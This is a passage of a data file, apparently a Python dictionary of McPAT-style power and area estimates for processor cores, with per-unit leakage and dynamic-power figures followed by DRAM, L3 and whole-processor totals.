'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.24081,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.121553,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.51166,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.148022,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.37409,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0280086,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00626218,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0556367,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0463126,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0836452,
'Execution Unit/Register Files/Runtime Dynamic': 0.0525748,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.124107,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.289599,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.48356,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00149251,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00149251,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00133224,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000533379,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000665285,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00498255,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0131573,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0445215,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.83195,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.143049,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.151215,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.18791,
'Instruction Fetch Unit/Runtime Dynamic': 0.356926,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.045366,
'L2/Runtime Dynamic': 0.00990159,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.43865,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.591447,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0388722,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0388721,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.62221,
'Load Store Unit/Runtime Dynamic': 0.822023,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0958522,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.191704,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0340183,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0346322,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.17608,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0236502,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.390627,
'Memory Management Unit/Runtime Dynamic': 0.0582824,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.2097,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0736777,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0076325,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0743879,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.155698,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.88639,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.100329,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.281491,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.541433,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.20546,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.3314,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.167279,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.704139,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.151978,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.07447,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.102288,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00861792,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0998953,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0637348,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.202184,
'Execution Unit/Register Files/Runtime Dynamic': 0.0723527,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.235539,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.489666,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.95303,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00109098,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00109098,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000969312,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000385665,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000915555,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00406683,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00977896,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0612699,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.89729,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.164237,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.2081,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.30495,
'Instruction Fetch Unit/Runtime Dynamic': 0.447453,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0474883,
'L2/Runtime Dynamic': 0.00730031,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59348,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.661821,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0438813,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0438814,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.80069,
'Load Store Unit/Runtime Dynamic': 0.92211,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.108204,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.216408,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0384019,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0390734,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.242319,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.027048,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.464396,
'Memory Management Unit/Runtime Dynamic': 0.0661213,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.2815,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.269073,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0125444,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0983465,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.379964,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.77597,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 4.014346384814995,
'Runtime Dynamic': 4.014346384814995,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.364186,
'Runtime Dynamic': 0.177291,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.6741,
'Peak Power': 106.786,
'Runtime Dynamic': 14.9538,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.3099,
'Total Cores/Runtime Dynamic': 14.7765,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.364186,
'Total L3s/Runtime Dynamic': 0.177291,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.071116
| 124
| 0.68211
| 8,082
| 68,615
| 5.785078
